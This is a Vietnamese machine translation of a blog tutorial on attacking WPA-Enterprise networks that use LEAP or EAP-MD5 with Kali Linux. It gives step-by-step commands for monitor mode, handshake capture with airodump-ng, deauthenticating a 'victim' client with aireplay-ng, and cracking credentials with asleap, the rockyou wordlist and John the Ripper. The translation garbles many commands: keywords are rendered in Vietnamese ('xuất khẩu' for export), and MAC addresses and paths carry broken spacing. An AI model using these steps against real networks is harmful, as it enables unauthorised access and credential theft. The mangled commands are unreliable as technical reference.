Wireless Pentesting trên giá rẻ (Kali + TL-WN722N) - WPA-Enterprise

Giới thiệu
Trong những bài viết trước đây của chúng tôi, chúng tôi sử dụng TP-Link TL-WN722N và Kali Virtual Machine (máy ảo) để thực hiện phát không dây và tấn công chống lại một Wired Equivalent Privacy (WEP) mạng, WPA (Pre-Shared Key) mạng PSK, một mạng ẩn của nó SSID, và một mạng lưới lọc MAC để giới thiệu khả năng của thiết lập giá rẻ và linh hoạt này.
WEP: http://securitysynapse.blogspot.com/2013/12/wireless-pentesting-on-cheap-kali-tl.html
WPA-PSK: http://securitysynapse.blogspot.com/2014/01/wireless-pentesting-on-cheap-kali-tl.html
Hidden SSID: http://securitysynapse.blogspot.com/2014/01/wireless-pentesting-on-cheap-kali-hiddenSSID.html
MAC Filtering: http://securitysynapse.blogspot.com/2014/02/wireless-pentesting-on-cheap-kali-MACFiltering.html
Trong bài viết này, chúng tôi sẽ làm tròn ra các bài kiểm tra của chúng tôi bằng cách tấn công một mạng thử nghiệm WPA-Enterprise sử dụng LEAP hoặc EAP-MD5. bài viết tiếp theo của chúng tôi (Phần II) sẽ bao gồm WPA-Enterprise PEAP và EAP-TLS.

Tham khảo bài viết WEP trước của chúng tôi cho các chủ đề sau khi họ bị bỏ qua từ bài viết này do tương tự:
Trang thiết bị
Phần cứng
Phần mềm
Các mẹo và thủ thuật
Phiên bản Workstation
Độ phân giải màn hình
Simple Text Editor
Kết nối các thiết bị USB


Đề cương
sự chuẩn bị
WPA-Enterprise Refresher
khám phá
Tấn công
LEAP và EAP-MD5 Explained
Thiết lập các biến
Chụp Handshake
Deauthenticate Client
Brute-buộc Credentials
MSCHAPv2
EAPMD5
biện pháp đối phó
Phần kết luận


sự chuẩn bị
NetworkManager (có trong mặc định Kali Linux) có thể gây ra vấn đề khi cố gắng để hoàn thành nhiệm vụ đơn giản như kết nối với mạng không dây. Để ngăn chặn sự can thiệp nào, chúng tôi sẽ vô hiệu hóa nó trước thời hạn.


root @ kali: ~ mạng quản lý # dừng dịch vụ
[Ok] Dừng quản lý kết nối mạng: NetworkManager.

WPA-Enterprise Refresher
Chúng tôi đã nhìn vào phá vỡ mạng WEP và WPA-PSK ở bài viết trước và nói rằng sự nguy hiểm trong việc sử dụng các tiêu chuẩn không dây là có một phím tĩnh chia sẻ rằng nên được thay đổi mỗi khi ai đó có kiến ​​thức về phím rời khỏi công ty. Sau khi tất cả, bạn sẽ không muốn một nhân viên cũ vẫn có thể kết nối được mạng sau khi khởi hành của họ - phải không? Đây là một vấn đề an ninh trong bất kỳ công ty có lượt thường xuyên hơn. Vậy thay thế bằng cái gì? WPA-Enterprise của khóa học!
WPA-Enterprise là lý tưởng cho các tổ chức lớn vì nó không sử dụng một phím được chia sẻ duy nhất trong đó tất cả người dùng sử dụng để kết nối với mạng không dây. Mỗi người dùng có tài khoản riêng của họ (thường là tên truy cập và mật khẩu) mà họ sử dụng để xác thực vào mạng. Hay nhất của tất cả các tài khoản này có thể được chứng thực tập trung và quản lý - thậm chí liên kết vào kho tài khoản hiện tại như Active Directory hoặc LDAP. Khi một nhân viên rời khỏi công ty và tài khoản của họ bị chấm dứt trong Active Directory, nó cũng sẽ được chấm dứt từ không dây nếu xác thực được truyền qua.
Việc duy nhất thuộc tính WPA-Enterprise khác là sử dụng các mở rộng giao thức chứng nhận (EAPs). Điều này cho phép triển khai nhiều và tăng tính linh hoạt cho các tập đoàn. Sự linh hoạt này là một lợi thế cạnh dao hai mặc dù là không phải tất cả các loại EAP được tạo ra bằng nhau (về bảo mật hoặc tính dễ triển khai). Các loại EAP chúng ta sẽ thảo luận trong bài viết này được in đậm dưới đây (vui lòng bỏ qua không in đậm như họ có mặt để được hoàn chỉnh):
LEAP - Lightweight EAP
Thông tin được gửi đi mà không bảo vệ đường hầm SSL, sử dụng các giao thức xác thực MS-CHAP.
"[P] roprietary không dây phương thức xác thực LAN được phát triển bởi Cisco Systems"
"LEAP sử dụng một phiên bản sửa đổi của MS-CHAP, một giao thức xác thực, trong đó thông tin người dùng không được bảo vệ mạnh mẽ."
"Cisco LEAP, tương tự như WEP, đã có những điểm yếu bảo mật nổi tiếng từ năm 2003 liên quan đến ẩn bẻ mật khẩu."
Nguồn: http://en.wikipedia.org/wiki/Lightweight_Extensible_Authentication_Protocol
EAP-MD5
Thông tin được gửi đi mà không bảo vệ SSL, nhưng MD5 băm.
"Nó cung cấp bảo mật tối thiểu; các hàm băm MD5 là dễ bị tấn công từ điển, và không hỗ trợ hệ trọng, mà làm cho nó không phù hợp để sử dụng với WEP năng động, hoặc WPA / WPA2 doanh nghiệp. "
Nguồn: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-MD5
PEAP - (Protected EAP)
"[E] ncapsulates Extensible Authentication Protocol (EAP) trong vòng một Transport Layer Security mã hóa và xác thực (TLS) đường hầm"
"Cùng nhau phát triển bởi Cisco Systems, Microsoft, và RSA Security."
"Yêu cầu duy nhất một giấy chứng nhận phía máy chủ PKI để tạo ra một đường hầm TLS an toàn để bảo vệ xác thực người dùng, và sử dụng giấy chứng nhận khóa công khai phía máy chủ để xác thực máy chủ"
Nguồn: http://en.wikipedia.org/wiki/Protected_Extensible_Authentication_Protocol
Hầu hết các giao thức xác thực nội tâm thường là MSCHAPv2 và GTC (thẻ)
EAP-TLS - (EAP-Transport Layer Security)
"[U] ses PKI để bảo đảm thông tin liên lạc với một máy chủ xác thực RADIUS hoặc một loại máy chủ xác thực."
"Mặc dù nó hiếm khi được triển khai, EAP-TLS vẫn được coi là một trong những tiêu chuẩn EAP an toàn nhất hiện có và được phổ được hỗ trợ bởi tất cả các nhà sản xuất phần cứng và phần mềm mạng LAN không dây."
Yêu cầu chứng nhận phía khách hàng, trong đó ngăn chặn rất nhiều các tổ chức sử dụng nó.
Nguồn: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-TLS
EAP-FAST - (Flexible xác thực qua đường hầm an toàn)
"[A] đề nghị giao thức của Cisco Systems là một sự thay thế cho LEAP."
"Sử dụng chứng chỉ máy chủ là tùy chọn trong EAP-FAST."
"EAP-FAST sử dụng Protected Access Credential (PAC) để thiết lập một đường hầm TLS trong đó thông tin của khách hàng được xác minh."
"Khi tự động trích lập dự phòng PAC được kích hoạt, EAP-FAST có một lỗ hổng nhỏ, nơi một kẻ tấn công có thể đánh chặn PAC và sử dụng để thỏa hiệp thông tin người dùng."
Nguồn: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-FAST

Discovery (kismet)
Trong bài viết trước, chúng tôi sử dụng iwlist, airodump-ng, và Kismet để khám phá mạng không dây. Đây cũng là trường hợp ở đây. Hãy xem dưới đây vào các thông tin mà iwlist cung cấp.


root @ kali: ~ # iwlist wlan1 quét | grep -A 30 CorpNetwork
                    ESSID: "CorpNetwork"
                    Giá Bit: 1 Mb / s; 2 Mb / s; 5,5 Mb / s; 11 Mb / s
                    Chế độ: Thạc sỹ
                    Extra: TSF = 000000000d674180
                    Extra: ngọn hải đăng cuối: 96ms trước
                    IE: Unknown: 000B436F72704E6574776F726B
                    IE: Unknown: 010482840B16
                    IE: Unknown: 030.101
                    IE: IEEE 802.11i / WPA2 Version 1
                        Nhóm Cipher: TKIP
                        Mật mã cặp (2): CCMP TKIP
                        Xác thực Suites (1): 802.1x
--snip--


Mặc dù ba công cụ có thể xác định các mạng WPA-Enterprise, không ai trong số họ có thể cho bạn biết các loại EAP. Đối với điều này, chúng tôi sử dụng Wireshark để kiểm tra các gói tin. Hãy nắm bắt một số lượng truy cập với airodump-ng và kiểm tra nó với Wireshark, nhưng lần đầu tiên chúng tôi muốn đặt các card không dây vào chế độ "Monitor".




root @ kali: ~ # airmon-ng wlan0 bắt đầu



Chúng tôi lần đầu tiên sử dụng airodump-ng mà không có bất kỳ tùy chọn để khám phá mạng, chúng tôi muốn kiểm tra và các chi tiết của nó. Sau khi chúng tôi nhận được thông tin này, chúng tôi tập trung nỗ lực thu thập của chúng tôi bằng cách khóa vào các kênh và AP.




cú pháp:
airodump-ng -c <CHANNEL> --bssid <APMAC> -w <FILE PREFIX> <INT>


Chìa khóa:
-c = Kênh rằng AP trên
--bssid = địa chỉ MAC của AP
-w = Tiền tố của tên tập tin mà bạn muốn ghi dữ liệu vào
<INT> = giao diện chúng tôi sẽ được chụp trên


Tấn công:
airodump-ng --bssid A0: F3: C1: 0C: B6: 46 -c 1 -w mysteryEAP mon0

Hình 2: airodump-ng được phát hiện mạng không dây
Từ ảnh chụp màn hình này, chúng tôi sẽ lưu ý một vài mặt hàng cho các cuộc tấn công sau:


Tên biến = Mô tả: Giá trị
==============================
$ ESSID = ESSID: CorpNetwork
$ CH = Channel: 1
$ AP = AP MAC: A0: F3: C1: 0C: B6: 46
$ VM = user Victim MAC: 24: 77: 03: 8C: D3: 44



Bây giờ bắt chúng tôi đang chạy, chúng ta có thể kiểm tra các gói tin với Wireshark. Để khám phá các loại EAP, chúng ta có thể sử dụng Wireshark của "Thống kê -> Nghị định thư Hierarchy" tính năng. Hãy tìm 802.1X xác thực và áp dụng một bộ lọc để những gói tin được chọn. Một phím tắt sẽ gõ "EAPOL" trong bộ lọc hiển thị.

Hình 3: Tính năng Wireshark Nghị định thư Hierarchy
Sau khi áp dụng các bộ lọc, chúng ta thấy rằng các loại EAP là Lightweight EAP của Cisco (LEAP).

Hình 4: EAP loại là LEAP


Tấn công
Bây giờ phát hiện ra đó là hoàn thành và chúng tôi hiểu các dạng EAP, chúng tôi sẽ xem xét các phương pháp tấn công cho LEAP và EAP-MD5. Các phác thảo dưới đây có thể được sử dụng cho hai kịch bản tấn công tương tự:
LEAP - Lightweight EAP
Capture 4-way handshake
Crack MSCHAPV2 với ASLEAP và từ điển
EAP-MD5
Capture 4-way handshake
Crack EAP-MD5 với eapmd5 và từ điển


LEAP và EAP-MD5 Explained
Kể từ khi LEAP và EAP-MD5 không sử dụng một đường hầm an toàn để vượt qua các giao thức xác thực, chúng ta chỉ cần thay đổi lưu lượng và crack các mật khẩu sử dụng một cuộc tấn công sức mạnh vũ phu. Tương tự như các cuộc tấn công bảo mật WPA-PSK, tất cả các thông tin cần thiết để crack các thông tin được chứa trong 4-way handshake, do đó các cuộc tấn công sẽ rất tương tự.
Thiết lập các biến
Bắt đầu chụp
Deauthenticate khách hàng
Crack các thông tin
Thiết lập các biến
Trong ví dụ của chúng tôi, thông tin nạn nhân được tóm tắt dưới đây:


Tên biến = Mô tả: Giá trị
==============================
$ ESSID = ESSID: CorpNetwork
$ CH = Channel: 1
$ AP = AP MAC: A0: F3: C1: 0C: B6: 46
$ VM = user Victim MAC: 24: 77: 03: 8C: D3: 44



Do đây là một số lượng thông tin mà có thể dễ dàng gõ sai (một số cánh trên một địa chỉ MAC), chúng tôi sử dụng các biến shell khi tấn công các mạng không dây. Ngoài ra, nó là một chút đau để nhập các giá trị cùng vào nhiều cửa sổ khác nhau.
Đó là thực tế tốt để mở 2-3 cửa sổ và sao chép đoạn mã sau vào mỗi cửa sổ để thiết lập các biến:


xuất khẩu ESSID = CorpNetwork
xuất khẩu CH = 1
xuất khẩu AP = A0: F3: C1: 0C: B6: 46
xuất khẩu VM = 24: 77: 03: 8C: D3: 44



Bây giờ chúng ta có cửa sổ của chúng tôi được thành lập và các biến môi trường thiết lập cho nạn nhân của chúng tôi, chúng ta hãy bắt đầu cuộc tấn công. Nếu bạn muốn thay đổi địa chỉ MAC của bạn cho ẩn phụ, bây giờ là thời gian để làm như vậy.
Chụp Handshake
Chúng ta bắt đầu bằng cách bắt các lưu lượng trong một nỗ lực để nắm bắt 4-way handshake. Đây là một cách thuận tiện để bắt đầu vì nó có thể khóa chúng tôi trên kênh của AP quan tâm (trong ví dụ này, kênh 6).


cú pháp:
airodump-ng -c <CHANNEL> --bssid <APMAC> -w <FILE PREFIX> <INT>


Chìa khóa:
-c = Kênh rằng AP trên
--bssid = địa chỉ MAC của AP
-w = Tiền tố của tên tập tin mà bạn muốn ghi dữ liệu vào
<INT> = giao diện chúng tôi sẽ được chụp trên


Tấn công:
airodump-ng -c $ CH --bssid $ AP -w WPA-LEAPcapture mon0



Deauthenticate Client
Mục tiêu ở đây là để deauthenticate (aka đá một khách hàng ra khỏi mạng) để họ kết nối vào mạng. Sau khi xác nhận lại của khách hàng, chúng ta có thể nắm bắt được cái bắt tay 4 chiều của họ.


cú pháp:
aireplay-ng -0 25 -a <AP> -c <VICTIM_MAC> <INT>


Chìa khóa:
-0 = (Giống như --deauth) tấn công deauthentication
-a = địa chỉ MAC của AP
-c = Victim địa chỉ MAC
<INT> = giao diện chúng tôi sẽ tấn công từ


Tấn công:
aireplay-ng -0 25 -a $ AP -c $ VM mon0



Khi bạn đang xem nơi cất tấn công của bạn, giữ một mắt trên góc phải trên cùng của cửa sổ chụp. Các thông báo sau sẽ xuất hiện khi bạn đã nắm bắt thành công 4-way handshake: "WPA handshake: XX: XX: XX: XX: XX: XX" (trong đó X của là địa chỉ MAC (BSSID) của AP bạn quan tâm) . Cảm thấy tự do để ngăn chặn quá trình chụp với Control + c sau cái bắt tay là bị bắt.


Brute-buộc Credentials
Kể từ khi các cuộc tấn công vào các giao thức xác thực nội WPA-Enterprise là một off-line brute-force tấn công, trước tiên bạn sẽ cần một danh sách từ đủ lớn để cung cấp cho các chương trình nứt. Danh sách rockyou.com từ là một khởi đầu tốt đẹp như nó gần như là 14,5 triệu mật khẩu. Để sử dụng các danh sách từ rockyou.com, bạn sẽ phải giải nén nó như hình dưới đây:


root @ kali: / usr / share / wordlists # ls
rockyou.txt.gz


root @ kali: / usr / share / wordlists # gunzip rockyou.txt.gz


root @ kali: / usr / share / wordlists # ls
rockyou.txt


root @ kali: / usr / share / wordlists # wc -l rockyou.txt
14344392 rockyou.txt



MSCHAPv2
Sau khi giải nén các danh sách từ, chạy asleap như hình dưới đây:


cú pháp:
root @ kali: ~ # asleap
asleap 2.2 - tích cực phục hồi mật khẩu LEAP / PPTP. <Jwright@hasborg.com>
asleap: Phải cung cấp một giao diện với -i, hoặc một tập tin được lưu trữ với -r
Cách sử dụng: asleap [tùy chọn]


 -r đọc từ một tập tin libpcap
 Giao diện -i để nắm bắt về
 tập tin từ điển -f với băm NT
 tập tin Index -n cho băm NT
 -S Bỏ qua kiểm tra để đảm bảo xác thực đã thành công
 -h Output này thông tin trợ giúp và thoát
 -v In thông tin tiết (thêm -v cho rườm rà hơn)
 V phiên bản chương trình In và thoát
 giá trị Challenge C trong byte ruột được phân định
 giá trị đáp ứng -R trong byte ruột được phân định
 tập -W điển ASCII (mục đích đặc biệt)


Tấn công:
root @ kali: ~ # asleap -W /usr/share/wordlists/rockyou.txt -r WPA-LEAPcapture-01.cap



Để biết thêm nỗ lực nứt phức tạp, nó có thể sử dụng John the Ripper (JTR) để thực hiện hoán vị và làm cho từ điển lớn hơn:


Tạo hoán vị với JTR:
/ Usr / sbin / john --Thông -w = / usr / share / wordlists / rockyou.txt --stdout


Nuôi hoán vị JTR vào asleap:
/ Usr / sbin / john --Thông -w = / usr / share / wordlists / rockyou.txt --stdout | asleap -W - -r <pcap>


E

http://securitysynapse.blogspot.com/2014/02/wireless-pentesting-on-cheap-kali-WPAEntPartI.html

Comments

Popular posts from this blog

Thiết lập card không dây trên Kali Linux

Monitor mode

Giới thiệu - Scapy